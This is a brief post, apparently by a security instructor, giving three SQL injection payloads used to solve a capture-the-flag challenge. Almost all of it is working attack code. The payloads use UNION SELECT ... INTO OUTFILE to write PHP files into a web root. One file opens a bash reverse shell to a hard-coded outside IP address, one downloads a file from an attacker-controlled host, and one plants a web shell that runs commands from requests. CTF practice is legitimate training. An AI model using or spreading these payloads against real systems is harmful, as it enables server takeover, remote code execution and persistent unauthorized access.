Useful SQL Injections
I used these to solve the "Robert Tables" problem in NEOCTF 2016
OPEN A REVERSE SHELL
' union select "<?php exec(\"/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\");" INTO OUTFILE '/var/www/ecustomers/samshell4.php' #
UPLOAD A FILE
' union select "<?php file_put_contents(\"root\", file_get_contents(\"http://attack.samsclass.info/root\")); ?>" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
OPEN A PHP SHELL
' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/ecustomers/samshell.php' #
Posted 4-1-16 by Sam Bowne